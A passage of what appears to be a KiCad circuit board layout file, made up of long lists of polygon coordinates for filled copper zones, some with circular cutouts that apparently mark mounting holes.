108.381022 105.660219) (xy 108.372118 105.660972) (xy 108.298842 105.667679) (xy 108.263867 105.67437) (xy 108.228452 105.678094) (xy 108.219711 105.679953) (xy 108.219483 105.680003) (xy 108.219456 105.679729) (xy 108.213997 105.619743) (xy 108.213363 105.617588) (xy 108.213144 105.615357) (xy 108.195759 105.557776) (xy 108.178731 105.499919) (xy 108.17769 105.497927) (xy 108.177042 105.495782) (xy 108.148757 105.442585) (xy 108.120862 105.389227) (xy 108.119459 105.387482) (xy 108.118403 105.385496) (xy 108.08031 105.33879) (xy 108.042596 105.291882) (xy 108.040874 105.290437) (xy 108.039458 105.288701) (xy 107.993129 105.250374) (xy 107.946912 105.211594) (xy 107.944942 105.210511) (xy 107.943216 105.209083) (xy 107.890324 105.180484) (xy 107.837456 105.15142) (xy 107.835313 105.15074) (xy 107.833343 105.149675) (xy 107.775828 105.131871) (xy 107.718396 105.113653) (xy 107.716168 105.113403) (xy 107.714023 105.112739) (xy 107.654156 105.106447) (xy 107.594269 105.099729) (xy 107.589954 105.099699) (xy 107.589801 105.099683) (xy 107.589648 105.099697) (xy 107.585333 105.099667) (xy 107.4795 105.099667) (xy 107.469855 105.100613) (xy 107.460177 105.099958) (xy 107.451247 105.100291) (xy 107.407457 105.102226) (xy 107.405898 105.102449) (xy 107.404324 105.102372) (xy 107.344066 105.111282) (xy 107.283807 105.119891) (xy 107.282321 105.120412) (xy 107.280761 105.120643) (xy 107.223376 105.141089) (xy 107.165942 105.161236) (xy 107.164585 105.162036) (xy 107.163101 105.162565) (xy 107.155042 105.166428) (xy 107.119711 105.183669) (xy 107.075712 105.210749) (xy 107.030775 105.236355) (xy 107.02257 105.243457) (xy 107.013337 105.249139) (xy 106.975435 105.284251) (xy 106.936329 105.318096) (xy 106.929659 105.326656) (xy 106.921707 105.334023) (xy 106.891332 105.375846) (xy 106.859559 105.416625) (xy 106.854684 105.426308) (xy 106.848307 105.435088) (xy 106.826629 105.482028) (xy 106.803388 105.528188) (xy 106.800226 105.536546) (xy 106.781746 105.586438) (xy 106.775679 105.609524) (xy 106.766867 105.631716) (xy 106.759838 105.669798) (xy 106.75981 105.669907) (xy 106.663488 105.68267) (xy 106.614621 105.694085) (xy 106.60565 105.695819) (xy 106.59667 105.696807) (xy 106.590524 105.698743) (xy 106.565352 105.703608) (xy 106.556803 105.706212) (xy 106.537667 105.712187) (xy 106.508118 105.724694) (xy 106.477532 105.734326) (xy 106.450755 105.748973) (xy 106.42264 105.760873) (xy 106.396096 105.778872) (xy 106.36795 105.794268) (xy 106.360601 105.799353) (xy 106.268273 105.864193) (xy 106.248559 105.881137) (xy 106.227036 105.895725) (xy 106.201302 105.921755) (xy 106.173549 105.94561) (xy 106.157501 105.966063) (xy 106.139222 105.984552) (xy 106.119032 106.015088) (xy 106.096443 106.043876) (xy 106.084675 106.06705) (xy 106.070333 106.088742) (xy 106.066211 106.096671) (xy 106.003735 106.218908) (xy 105.994748 106.241757) (xy 105.983117 106.263373) (xy 105.97194 106.299741) (xy 105.958014 106.335146) (xy 105.953637 106.359296) (xy 105.946424 106.382768) (xy 105.944706 106.391538) (xy 105.909279 106.57934) (xy 105.905602 106.620681) (xy 105.899214 106.661707) (xy 105.898771 106.670632) (xy 105.888162 106.91868) (xy 105.888155 106.918829) (xy 105.887584 106.932183) (xy 105.887929 106.938446) (xy 105.887587 106.941699) (xy 105.88809 106.947221) (xy 105.887001 106.958068) (xy 105.887044 106.967004) (xy 105.887937 107.043385) (xy 105.890001 107.062175) (xy 105.889489 107.081076) (xy 105.890182 107.089985) (xy 105.909606 107.319025) (xy 105.920732 107.379361) (xy 105.931797 107.44026) (xy 105.932241 107.441776) (xy 105.932256 107.44186) (xy 105.93229 107.441947) (xy 105.934306 107.448837) (xy 105.982171 107.608395) (xy 106.003854 107.661269) (xy 106.012087 107.682335) (xy 105.995374 107.702537) (xy 105.956594 107.748754) (xy 105.955511 107.750724) (xy 105.954083 107.75245) (xy 105.925484 107.805342) (xy 105.89642 107.85821) (xy 105.89574 107.860353) (xy 105.894675 107.862323) (xy 105.876871 107.919838) (xy 105.858653 107.97727) (xy 105.858403 107.979498) (xy 105.857739 107.981643) (xy 105.851447 108.04151) (xy 105.844729 108.101397) (xy 105.844699 108.105712) (xy 105.844683 108.105865) (xy 105.844697 108.106018) (xy 105.844667 108.110333) (xy 26.139455 108.110333) (xy 24.085098 104.551459) (xy 24.053377 104.490702) (xy 21.762242 99.608899) (xy 21.645142 99.340439) (xy 21.546488 99.075435) (xy 21.46263 98.805825) (xy 21.393707 98.532232) (xy 21.339858 98.255281) (xy 21.301219 97.975583) (xy 21.277932 97.693768) (xy 21.269875 97.401) (xy 21.269864 96.750457) (xy 34.678144 96.750457) (xy 34.678144 97.269507) (xy 34.779405 97.778583) (xy 34.978037 98.258123) (xy 35.266406 98.689697) (xy 35.633429 99.05672) (xy 36.065003 99.345089) (xy 36.544543 99.543721) (xy 37.053619 99.644982) (xy 37.572669 99.644982) (xy 38.081745 99.543721) (xy 38.561285 99.345089) (xy 38.992859 99.05672) (xy 39.359882 98.689697) (xy 39.648251 98.258123) (xy 39.846883 97.778583) (xy 39.948144 97.269507) (xy 39.948144 96.750457) (xy 39.846883 96.241381) (xy 39.648251 95.761841) (xy 39.359882 95.330267) (xy 38.992859 94.963244) (xy 38.561285 94.674875) (xy 38.081745 94.476243) (xy 37.572669 94.374982) (xy 37.053619 94.374982) (xy 36.544543 94.476243) (xy 36.065003 94.674875) (xy 35.633429 94.963244) (xy 35.266406 95.330267) (xy 34.978037 95.761841) (xy 34.779405 96.241381) (xy 34.678144 96.750457) (xy 21.269864 96.750457) (xy 21.26955 79.549575) (xy 59.278046 79.549575) (xy 59.278046 80.068625) (xy 59.379307 80.577701) (xy 59.577939 81.057241) (xy 59.866308 81.488815) (xy 60.233331 81.855838) (xy 60.664905 82.144207) (xy 61.144445 82.342839) (xy 61.653521 82.4441) (xy 62.172571 82.4441) (xy 62.681647 82.342839) (xy 63.161187 82.144207) (xy 63.452026 81.949874) (xy 135.47805 81.949874) (xy 135.47805 82.468924) (xy 135.579311 82.978) (xy 135.777943 83.45754) (xy 136.066312 83.889114) (xy 136.433335 84.256137) (xy 136.864909 84.544506) (xy 137.344449 84.743138) (xy 137.853525 84.844399) (xy 138.372575 84.844399) (xy 138.881651 84.743138) (xy 139.361191 84.544506) (xy 139.792765 84.256137) (xy 140.159788 83.889114) (xy 140.448157 83.45754) (xy 140.646789 82.978) (xy 140.74805 82.468924) (xy 140.74805 81.949874) (xy 140.646789 81.440798) (xy 140.448157 80.961258) (xy 140.159788 80.529684) (xy 139.792765 80.162661) (xy 139.361191 79.874292) (xy 138.881651 79.67566) (xy 138.372575 79.574399) (xy 137.853525 79.574399) (xy 137.344449 79.67566) (xy 136.864909 79.874292) (xy 136.433335 80.162661) (xy 136.066312 80.529684) (xy 135.777943 80.961258) (xy 135.579311 81.440798) (xy 135.47805 81.949874) (xy 63.452026 81.949874) (xy 63.592761 81.855838) (xy 63.959784 81.488815) (xy 64.248153 81.057241) (xy 64.446785 80.577701) (xy 64.548046 80.068625) (xy 64.548046 79.549575) (xy 64.446785 79.040499) (xy 64.248153 78.560959) (xy 63.959784 78.129385) (xy 63.592761 77.762362) (xy 63.161187 77.473993) (xy 62.681647 77.275361) (xy 62.172571 77.1741) (xy 61.653521 77.1741) (xy 61.144445 77.275361) (xy 60.664905 77.473993) (xy 60.233331 77.762362) (xy 59.866308 78.129385) (xy 59.577939 78.560959) (xy 59.379307 79.040499) (xy 59.278046 79.549575) (xy 21.26955 79.549575) (xy 21.268857 41.549903) (xy 59.278046 41.549903) (xy 59.278046 42.068953) (xy 59.379307 42.578029) (xy 59.577939 43.057569) (xy 59.866308 43.489143) (xy 60.233331 43.856166) (xy 60.664905 44.144535) (xy 61.144445 44.343167) (xy 61.653521 44.444428) (xy 62.172571 44.444428) (xy 62.681647 44.343167) (xy 63.161187 44.144535) (xy 63.592761 43.856166) (xy 63.699385 43.749542) (xy 135.47805 43.749542) (xy 135.47805 44.268592) (xy 135.579311 44.777668) (xy 135.777943 45.257208) (xy 136.066312 45.688782) (xy 136.433335 46.055805) (xy 136.864909 46.344174) (xy 137.344449 46.542806) (xy 137.853525 46.644067) (xy 138.372575 46.644067) (xy 138.881651 46.542806) (xy 139.361191 46.344174) (xy 139.792765 46.055805) (xy 140.159788 45.688782) (xy 140.448157 45.257208) (xy 140.646789 44.777668) (xy 140.74805 44.268592) (xy 140.74805 43.749542) (xy 140.646789 43.240466) (xy 140.448157 42.760926) (xy 140.159788 42.329352) (xy 139.792765 41.962329) (xy 139.361191 41.67396) (xy 138.881651 41.475328) (xy 138.372575 41.374067) (xy 137.853525 41.374067) (xy 137.344449 41.475328) (xy 136.864909 41.67396) (xy 136.433335 41.962329) (xy 136.066312 42.329352) (xy 135.777943 42.760926) (xy 135.579311 43.240466) (xy 135.47805 43.749542) (xy 63.699385 43.749542) (xy 63.959784 43.489143) (xy 64.248153 43.057569) (xy 64.446785 42.578029) (xy 64.548046 42.068953) (xy 64.548046 41.549903) (xy 64.446785 41.040827) (xy 64.248153 40.561287) (xy 63.959784 40.129713) (xy 63.592761 39.76269) (xy 63.161187 39.474321) (xy 62.681647 39.275689) (xy 62.172571 39.174428) (xy 61.653521 39.174428) (xy 61.144445 39.275689) (xy 60.664905 39.474321) (xy 60.233331 39.76269) (xy 59.866308 40.129713) (xy 59.577939 40.561287) (xy 59.379307 41.040827) (xy 59.278046 41.549903) (xy 21.268857 41.549903) (xy 21.268476 20.739885) (xy 21.281514 20.610545) (xy 21.308218 20.524518) (xy 21.350695 20.446257) (xy 21.407479 20.377433) (xy 21.476301 20.320649) (xy 21.554557 20.278172) (xy 21.640571 20.251472) (xy 21.769924 20.238433) ) ) (filled_polygon (pts (xy 122.475699 112.566905) (xy 122.930441 112.582469) (xy 122.939168 112.581914) (xy 122.947865 112.582828) (xy 122.989667 112.579024) (xy 122.989667 113.027461) (xy 122.956801 113.024007) (xy 122.941445 113.025404) (xy 122.926046 113.024531) (xy 122.91712 113.02496) (xy 122.503387 113.047758) (xy 122.41305 113.052121) (xy 122.30805 113.052556) (xy 122.307979 113.051919) (xy 122.302067 112.781182) (xy 122.302066 112.775029) (xy 122.304677 112.563393) ) ) (filled_polygon (pts (xy 113.277292 108.076779) (xy 113.301931 108.095844) (xy 113.330083 108.109899) (xy 113.356727 108.126614) (xy 113.385826 108.137728) (xy 113.413685 108.151636) (xy 113.444012 108.15995) (xy 113.473412 108.171179) (xy 113.504118 108.176429) (xy 113.534145 108.184661) (xy 113.542963 108.18611) (xy 113.581977 108.192241) (xy 113.59541 108.193023) (xy 113.608561 108.195849) (xy 113.657659 108.196645) (xy 113.706673 108.199498) (xy 113.719995 108.197657) (xy 113.73345 108.197875) (xy 113.742351 108.197085) (xy 113.771388 108.194304) (xy 113.810933 108.186566) (xy 113.850937 108.181592) (xy 113.872104 108.174596) (xy 113.893969 108.170318) (xy 113.931262 108.155045) (xy 113.969535 108.142396) (xy 113.988936 108.131425) (xy 114.009557 108.12298) (xy 114.04317 108.100757) (xy 114.057462 108.092675) (xy 114.077919 108.100669) (xy 114.10452 108.114338) (xy 114.112851 108.117568) (xy 114.253071 108.17082) (xy 114.267905 108.174849) (xy 114.281985 108.181015) (xy 114.328075 108.191191) (xy 114.37361 108.203559) (xy 114.388937 108.20463) (xy 114.403953 108.207945) (xy 114.412833 108.208949) (xy 114.596621 108.22843) (xy 114.625767 108.228659) (xy 114.654728 108.231927) (xy 114.663664 108.231995) (xy 114.858348 108.232122) (xy 114.897912 108.228269) (xy 114.93765 108.227242) (xy 114.94651 108.226079) (xy 115.105042 108.204137) (xy 115.112929 108.202246) (xy 115.12101 108.20172) (xy 115.173585 108.187706) (xy 115.226508 108.17502) (xy 115.233867 108.171639) (xy 115.241702 108.16955) (xy 115.250048 108.166358) (xy 115.356703 108.12472) (xy 115.360507 108.122788) (xy 115.364595 108.121578) (xy 115.416171 108.094516) (xy 115.435126 108.084889) (xy 115.438258 108.086743) (xy 115.483009 108.115062) (xy 115.491924 108.118507) (xy 115.500152 108.123377) (xy 115.550098 108.140987) (xy 115.599518 108.160084) (xy 115.608145 108.162416) (xy 115.742105 108.197628) (xy 115.751376 108.199117) (xy 115.760262 108.202117) (xy 115.812961 108.209011) (xy 115.86543 108.217441) (xy 115.874801 108.217102) (xy 115.884112 108.21832) (xy 115.893046 108.218546) (xy 116.064237 108.221692) (xy 116.125251 108.216839) (xy 116.186354 108.212214) (xy 116.188634 108.211798) (xy 116.18875 108.211789) (xy 116.188869 108.211755) (xy 116.195145 108.210611) (xy 116.357339 108.179878) (xy 116.367931 108.176775) (xy 116.372082 108.177895) (xy 116.389217 108.180763) (xy 116.40577 108.186014) (xy 116.450686 108.191053) (xy 116.495274 108.198516) (xy 116.512634 108.198002) (xy 116.529897 108.199938) (xy 116.538833 108.2) (xy 116.644667 108.2) (xy 116.668386 108.197674) (xy 116.668353 108.201086) (xy 116.6638 108.460213) (xy 116.66237 108.494191) (xy 116.607654 108.501027) (xy 116.587578 108.505559) (xy 116.567076 108.507425) (xy 116.526778 108.519285) (xy 116.485815 108.528533) (xy 116.467002 108.536878) (xy 116.447252 108.542691) (xy 116.410027 108.562152) (xy 116.371638 108.579181) (xy 116.354801 108.591024) (xy 116.33656 108.60056) (xy 116.303829 108.626876) (xy 116.269473 108.651041) (xy 116.255259 108.665927) (xy 116.239215 108.678826) (xy 116.212212 108.711007) (xy 116.183212 108.741377) (xy 116.172161 108.758738) (xy 116.158927 108.77451) (xy 116.138687 108.811326) (xy 116.11614 108.846748) (xy 116.108673 108.865923) (xy 116.098753 108.883966) (xy 116.086052 108.924006) (xy 116.070812 108.963138) (xy 116.06721 108.983406) (xy 116.060986 109.003026) (xy 116.056304 109.044763) (xy 116.048954 109.086117) (xy 116.049357 109.106694) (xy 116.047062 109.127153) (xy 116.047 109.136089) (xy 116.047 109.562106) (xy 116.048647 109.578905) (xy 116.047886 109.59576) (xy 116.05473 109.640938) (xy 116.059189 109.686416) (xy 116.064066 109.702569) (xy 116.066594 109.719258) (xy 116.082087 109.762258) (xy 116.095291 109.805991) (xy 116.103212 109.820889) (xy 116.108934 109.836769) (xy 116.132477 109.875928) (xy 116.15393 109.916277) (xy 116.164598 109.929358) (xy 116.173292 109.943818) (xy 116.203995 109.977663) (xy 116.232875 110.013072) (xy 116.245874 110.023826) (xy 116.257217 110.036329) (xy 116.293923 110.063575) (xy 116.329117 110.09269) (xy 116.343955 110.100713) (xy 116.357512 110.110776) (xy 116.398811 110.130373) (xy 116.43899 110.152098) (xy 116.455107 110.157087) (xy 116.470358 110.164324) (xy 116.514658 110.175521) (xy 116.55831 110.189034) (xy 116.575099 110.190799) (xy 116.591456 110.194933) (xy 116.637083 110.197313) (xy 116.682532 110.20209) (xy 116.699337 110.200561) (xy 116.716192 110.20144) (xy 116.725115 110.20097) (xy 117.122705 110.177249) (xy 117.122729 110.177248) (xy 117.175964 110.174118) (xy 117.176122 110.174093) (xy 117.180885 110.173809) (xy 117.350414 110.16253) (xy 117.364416 110.16021) (xy 117.378611 110.160027) (xy 117.387485 110.158978) (xy 117.52564 110.14167) (xy 117.56857 110.131963) (xy 117.611996 110.124755) (xy 117.62061 110.122378) (xy 117.730693 110.091176) (xy 117.75156 110.082988) (xy 117.773277 110.07748) (xy 117.809563 110.060227) (xy 117.846968 110.045549) (xy 117.865838 110.033469) (xy 117.88608 110.023845) (xy 117.893705 110.019185) (xy 117.979012 109.96623) (xy 118.016527 109.937516) (xy 118.055366 109.910628) (xy 118.06603 109.899626) (xy 118.078199 109.890312) (xy 118.109417 109.854865) (xy 118.1423 109.82094) (xy 118.147814 109.813908) (xy 118.190825 109.758272) (xy 118.193217 109.760343) (xy 118.202728 109.771472) (xy 118.209213 109.777621) (xy 118.370573 109.928513) (xy 118.409539 109.958391) (xy 118.447233 109.989885) (xy 118.459027 109.996337) (xy 118.469694 110.004516) (xy 118.513707 110.026249) (xy 118.556813 110.04983) (xy 118.565059 110.053275) (xy 118.784332 110.143116) (xy 118.843783 110.160929) (xy 118.902977 110.17877) (xy 118.903929 110.178951) (xy 118.903982 110.178967) (xy 118.904044 110.178973) (xy 118.911756 110.18044) (xy 118.948702 110.187202) (xy 118.969107 110.188905) (xy 118.989108 110.193271) (xy 118.99799 110.194254) (xy 119.129803 110.207906) (xy 119.140311 110.207963) (xy 119.150673 110.209723) (xy 119.159591 110.21029) (xy 119.336073 110.220273) (xy 119.342229 110.220019) (xy 119.348336 110.220849) (xy 119.357268 110.221119) (xy 119.550717 110.225639) (xy 119.565132 110.224565) (xy 119.579558 110.225664) (xy 119.588491 110.225407) (xy 119.858801 110.215761) (xy 119.893062 110.211163) (xy 119.927602 110.209576) (xy 119.936437 110.208234) (xy 120.218324 110.163431) (xy 120.278263 110.147784) (xy 120.338166 110.132254) (xy 120.33912 110.131897) (xy 120.33918 110.131881) (xy 120.339242 110.131851) (xy 120.346535 110.129119) (xy 120.55685 110.048663) (xy 120.567263 110.043463) (xy 120.556362 110.089426) (xy 120.542878 110.138009) (xy 120.541965 110.150127) (xy 120.539162 110.161943) (xy 120.537278 110.212298) (xy 120.533489 110.262562) (xy 120.534946 110.274623) (xy 120.534492 110.286761) (xy 120.542425 110.336527) (xy 120.54847 110.386566) (xy 120.552242 110.398113) (xy 120.554154 110.41011) (xy 120.571609 110.457404) (xy 120.587253 110.505299) (xy 120.593194 110.51589) (xy 120.597401 110.52729) (xy 120.6237 110.570278) (xy 120.648358 110.614238) (xy 120.65352 110.621532) (xy 120.918588 110.990564) (xy 120.918607 110.990591) (xy 121.018053 111.129042) (xy 121.01428 111.132643) (xy 120.854675 111.287117) (xy 120.834761 111.31057) (xy 120.81262 111.331927) (xy 120.794435 111.35806) (xy 120.773828 111.382328) (xy 120.759443 111.408135) (xy 120.725273 111.354154) (xy 120.693321 111.31316) (xy 120.66273 111.271132) (xy 120.656745 111.264496) (xy 120.525289 111.120784) (xy 120.491199 111.090143) (xy 120.458763 111.057775) (xy 120.444842 111.048477) (xy 120.432393 111.037287) (xy 120.393023 111.013864) (xy 120.354897 110.988398) (xy 120.346987 110.984239) (xy 120.179876 110.897838) (xy 120.154937 110.887893) (xy 120.131271 110.875236) (xy 120.097073 110.864819) (xy 120.063854 110.851573) (xy 120.037465 110.846663) (xy 120.011785 110.838841) (xy 120.003011 110.837146) (xy 119.778899 110.795447) (xy 119.746415 110.792639) (xy 119.71433 110.786805) (xy 119.705419 110.786134) (xy 119.627508 110.780815) (xy 119.592375 110.781854) (xy 119.557277 110.779883) (xy 119.548351 110.780318) (xy 119.244675 110.79722) (xy 119.235767 110.798597) (xy 119.226765 110.79847) (xy 119.174145 110.808121) (xy 119.121234 110.816298) (xy 119.112768 110.819377) (xy 119.103908 110.821002) (xy 119.095335 110.823524) (xy 118.835856 110.901831) (xy 118.810551 110.912257) (xy 118.784256 110.919841) (xy 118.752944 110.935993) (xy 118.720369 110.949415) (xy 118.699099 110.963543) (xy 118.599976 110.910317) (xy 118.588846 110.905676) (xy 118.578586 110.899344) (xy 118.531285 110.881675) (xy 118.48469 110.862247) (xy 118.472876 110.859857) (xy 118.461577 110.855637) (xy 118.452925 110.853403) (xy 118.231811 110.797936) (xy 118.171969 110.789011) (xy 118.112043 110.779712) (xy 118.108416 110.779534) (xy 118.108271 110.779512) (xy 118.108121 110.779519) (xy 118.103117 110.779273) (xy 117.865446 110.769227) (xy 117.807674 110.772436) (xy 117.749914 110.774805) (xy 117.741072 110.776103) (xy 117.740735 110.776155) (xy 117.740732 110.776155) (xy 117.740729 110.776156) (xy 117.505221 110.812399) (xy 117.502876 110.812999) (xy 117.500461 110.81315) (xy 117.442339 110.828485) (xy 117.384211 110.843354) (xy 117.382032 110.844396) (xy 117.379688 110.845014) (xy 117.371334 110.848185) (xy 117.321839 110.867363) (xy 117.320123 110.86642) (xy 117.31798 110.86574) (xy 117.31601 110.864675) (xy 117.258495 110.846871) (xy 117.201063 110.828653) (xy 117.198835 110.828403) (xy 117.19669 110.827739) (xy 117.136823 110.821447) (xy 117.076936 110.814729) (xy 117.072621 110.814699) (xy 117.072468 110.814683) (xy 117.072315 110.814697) (xy 117.068 110.814667) (xy 116.517667 110.814667) (xy 116.457729 110.820544) (xy 116.397743 110.826003) (xy 116.395588 110.826637) (xy 116.393357 110.826856) (xy 116.335776 110.844241) (xy 116.277919 110.861269) (xy 116.275927 110.86231) (xy 116.273782 110.862958) (xy 116.220585 110.891243) (xy 116.167227 110.919138) (xy 116.165482 110.920541) (xy 116.163496 110.921597) (xy 116.116822 110.959664) (xy 116.069882 110.997404) (xy 116.068437 110.999126) (xy 116.066701 111.000542) (xy 116.028374 111.046871) (xy 115.989594 111.093088) (xy 115.988511 111.095058) (xy 115.987083 111.096784) (xy 115.958484 111.149676) (xy 115.92942 111.202544) (xy 115.92874 111.204687) (xy 115.927675 111.206657) (xy 115.923043 111.22162) (xy 115.84703 111.143164) (xy 115.829606 111.128385) (xy 115.814148 111.111561) (xy 115.78208 111.088071) (xy 115.751776 111.062367) (xy 115.731821 111.051258) (xy 115.713383 111.037752) (xy 115.705661 111.033254) (xy 115.532076 110.933753) (xy 115.518005 110.927423) (xy 115.505021 110.919098) (xy 115.461158 110.901849) (xy 115.418167 110.882508) (xy 115.40314 110.879033) (xy 115.388781 110.873386) (xy 115.380168 110.871003) (xy 115.348913 110.862589) (xy 115.31455 110.856859) (xy 115.280798 110.848173) (xy 115.271958 110.846864) (xy 115.143367 110.828721) (xy 115.127066 110.828029) (xy 115.111029 110.824994) (xy 115.102123 110.824259) (xy 114.916705 110.810264) (xy 114.910798 110.810396) (xy 114.90496 110.809486) (xy 114.896035 110.80904) (xy 114.673575 110.799473) (xy 114.67077 110.799627) (xy 114.667985 110.799257) (xy 114.659052 110.799014) (xy 114.419342 110.794153) (xy 114.417157 110.794323) (xy 114.414967 110.794078) (xy 114.406031 110.794021) (xy 114.168855 110.794145) (xy 114.165469 110.794479) (xy 114.162075 110.794184) (xy 114.15314 110.794346) (xy 113.938286 110.799736) (xy 113.930581 110.800687) (xy 113.92283 110.800311) (xy 113.913908 110.800813) (xy 113.741166 110.811747) (xy 113.718114 110.81549) (xy 113.694774 110.816385) (xy 113.685929 110.817659) (xy 113.575085 110.834416) (xy 113.529798 110.845873) (xy 113.484005 110.855077) (xy 113.475476 110.857744) (xy 113.426686 110.873376) (xy 113.383811 110.891899) (xy 113.344702 110.906547) (xy 113.348502 110.230597) (xy 113.342783 110.168687) (xy 113.337176 110.107076) (xy 113.337052 110.106655) (xy 113.337012 110.106221) (xy 113.319469 110.046913) (xy 113.30191 109.987252) (xy 113.301707 109.986863) (xy 113.301583 109.986445) (xy 113.272583 109.931156) (xy 113.244041 109.87656) (xy 113.243769 109.876221) (xy 113.243564 109.875831) (xy 113.204634 109.827547) (xy 113.165775 109.779215) (xy 113.165437 109.778931) (xy 113.165165 109.778594) (xy 113.117951 109.739086) (xy 113.070091 109.698927) (xy 113.069706 109.698715) (xy 113.069372 109.698436) (xy 113.015192 109.668746) (xy 112.960635 109.638753) (xy 112.960217 109.638621) (xy 112.959835 109.638411) (xy 112.900519 109.619684) (xy 112.841575 109.600986) (xy 112.841144 109.600938) (xy 112.840724 109.600805) (xy 112.779071 109.593975) (xy 112.717448 109.587062) (xy 112.716625 109.587056) (xy 112.716577 109.587051) (xy 112.716523 109.587056) (xy 112.708512 109.587) (xy 112.115 109.587) (xy 112.055527 109.592832) (xy 111.995842 109.59819) (xy 111.993309 109.598932) (xy 111.99069 109.599189) (xy 111.933511 109.616453) (xy 111.875975 109.63331) (xy 111.873633 109.634531) (xy 111.871115 109.635291) (xy 111.818297 109.663374) (xy 111.765213 109.691044) (xy 111.76316 109.692691) (xy 111.760829 109.69393) (xy 111.714475 109.731736) (xy 111.667772 109.769192) (xy 111.666072 109.771212) (xy 111.664034 109.772875) (xy 111.625947 109.818915) (xy 111.587368 109.864778) (xy 111.586094 109.867088) (xy 111.584416 109.869117) (xy 111.555988 109.921693) (xy 111.527061 109.97416) (xy 111.52626 109.976674) (xy 111.525008 109.97899) (xy 111.507333 110.036089) (xy 111.489149 110.093174) (xy 111.488852 110.095789) (xy 111.488072 110.09831) (xy 111.48182 110.157792) (xy 111.475073 110.217284) (xy 111.475031 110.222386) (xy 111.475016 110.222532) (xy 111.475029 110.222674) (xy 111.475 110.22622) (xy 111.474312 110.791) (xy 111.302924 110.77818) (xy 111.257387 110.779231) (xy 111.211848 110.777865) (xy 111.202937 110.778533) (xy 110.962507 110.798226) (xy 110.907169 110.808265) (xy 110.851654 110.817221) (xy 110.843029 110.819559) (xy 110.630583 110.878732) (xy 110.609487 110.886899) (xy 110.587542 110.892374) (xy 110.551382 110.909395) (xy 110.514102 110.923828) (xy 110.494997 110.935936) (xy 110.47453 110.94557) (xy 110.466887 110.9502) (xy 110.304377 111.050205) (xy 110.302853 111.051362) (xy 110.301147 111.052207) (xy 110.253131 111.089113) (xy 110.204896 111.125736) (xy 110.203632 111.12716) (xy 110.202115 111.128326) (xy 110.195638 111.134483) (xy 110.180672 111.148909) (xy 110.144018 111.191898) (xy 110.106561 111.234199) (xy 110.101369 111.241472) (xy 109.969776 111.428544) (xy 109.961621 111.442945) (xy 109.95149 111.45602) (xy 109.930906 111.497181) (xy 109.908224 111.537232) (xy 109.903024 111.552935) (xy 109.895622 111.567735) (xy 109.892483 111.576101) (xy 109.797467 111.83478) (xy 109.784359 111.885216) (xy 109.769617 111.935212) (xy 109.768 111.944) (xy 109.767981 111.944107) (xy 109.348652 110.770248) (xy 109.349236 110.769524) (xy 109.364385 110.755079) (xy 109.370172 110.74827) (xy 109.452346 110.650206) (xy 109.469042 110.625787) (xy 109.488169 110.603209) (xy 109.504212 110.574349) (xy 109.522845 110.547097) (xy 109.534482 110.519895) (xy 109.548857 110.494036) (xy 109.558989 110.462611) (xy 109.571974 110.432258) (xy 109.578105 110.403319) (xy 109.587185 110.375157) (xy 109.589022 110.366411) (xy 109.597966 110.322331) (xy 109.60074 110.295349) (xy 109.606483 110.268828) (xy 109.60745 110.259944) (xy 109.619725 110.139476) (xy 109.619749 110.133171) (xy 109.620876 110.126965) (xy 109.621545 110.118054) (xy 109.633626 109.940534) (xy 109.633584 109.939122) (xy 109.633812 109.93772) (xy 109.634317 109.928798) (xy 109.645183 109.709819) (xy 109.645177 109.709694) (xy 109.645195 109.709572) (xy 109.645572 109.700643) (xy 109.654202 109.455794) (xy 109.654192 109.455635) (xy 109.654341 109.451412) (xy 109.675073 108.721163) (xy 109.674597 108.714304) (xy 109.675315 108.707468) (xy 109.670272 108.652055) (xy 109.666417 108.596557) (xy 109.664618 108.589924) (xy 109.663995 108.583076) (xy 109.64828 108.529682) (xy 109.633723 108.476005) (xy 109.63067 108.469849) (xy 109.628729 108.463252) (xy 109.602953 108.413947) (xy 109.578237 108.3641) (xy 109.574044 108.35865) (xy 109.57086 108.35256) (xy 109.535997 108.309198) (xy 109.502071 108.265103) (xy 109.496904 108.260575) (xy 109.492594 108.255215) (xy 109.449939 108.219423) (xy 109.437528 108.208548) (xy 109.440515 108.208852) (xy 109.628751 108.226697) (xy 109.658036 108.226603) (xy 109.687179 108.229551) (xy 109.696116 108.229516) (xy 109.939136 108.226872) (xy 109.944722 108.226263) (xy 109.950323 108.226652) (xy 110.006773 108.219496) (xy 110.063306 108.213331) (xy 110.06866 108.211651) (xy 110.074236 108.210944) (xy 110.082936 108.2089) (xy 110.258205 108.166417) (xy 110.316539 108.146074) (xy 110.351882 108.133845) (xy 110.372036 108.145236) (xy 110.375627 108.146422) (xy 110.378947 108.148247) (xy 110.434903 108.165997) (xy 110.490643 108.184404) (xy 110.494402 108.184871) (xy 110.498007 108.186014) (xy 110.556332 108.192557) (xy 110.614598 108.199788) (xy 110.618371 108.199516) (xy 110.622134 108.199938) (xy 110.63107 108.2) (xy 110.672974 108.2) (xy 110.680643 108.224576) (xy 110.684182 108.232782) (xy 110.714196 108.301057) (xy 110.734465 108.33713) (xy 110.752306 108.374467) (xy 110.764993 108.391463) (xy 110.775381 108.409951) (xy 110.802264 108.441393) (xy 110.827023 108.474561) (xy 110.842774 108.488773) (xy 110.856552 108.504887) (xy 110.889043 108.530519) (xy 110.919761 108.558235) (xy 110.937958 108.569108) (xy 110.954616 108.58225) (xy 110.981278 108.595875) (xy 110.987625 108.600511) (xy 111.000646 108.606567) (xy 111.026983 108.622304) (xy 111.035091 108.626061) (xy 111.047866 108.631872) (xy 111.059476 108.635838) (xy 111.06584 108.63909) (xy 111.078026 108.642554) (xy 111.100882 108.653184) (xy 111.133899 108.661259) (xy 111.166067 108.672247) (xy 111.194413 108.676059) (xy 111.222212 108.682858) (xy 111.231067 108.684061) (xy 111.313088 108.69463) (xy 111.339674 108.695439) (xy 111.366008 108.699227) (xy 111.374938 108.699567) (xy 111.511491 108.703824) (xy 111.522656 108.70308) (xy 111.533803 108.704131) (xy 111.542739 108.704035) (xy 111.712425 108.701037) (xy 111.715426 108.700689) (xy 111.718448 108.700903) (xy 111.727379 108.700598) (xy 111.773526 108.698703) (xy 111.776549 108.698281) (xy 111.779602 108.698425) (xy 111.788524 108.697911) (xy 111.96003 108.686832) (xy 111.9864 108.682516) (xy 112.013097 108.681175) (xy 112.021926 108.679796) (xy 112.134742 108.661371) (xy 112.139861 108.660011) (xy 112.145137 108.659585) (xy 112.200174 108.643991) (xy 112.255463 108.629306) (xy 112.260217 108.626979) (xy 112.265312 108.625536) (xy 112.273608 108.622215) (xy 112.349143 108.59136) (xy 112.372963 108.578791) (xy 112.398023 108.568952) (xy 112.428064 108.549715) (xy 112.459613 108.533067) (xy 112.480529 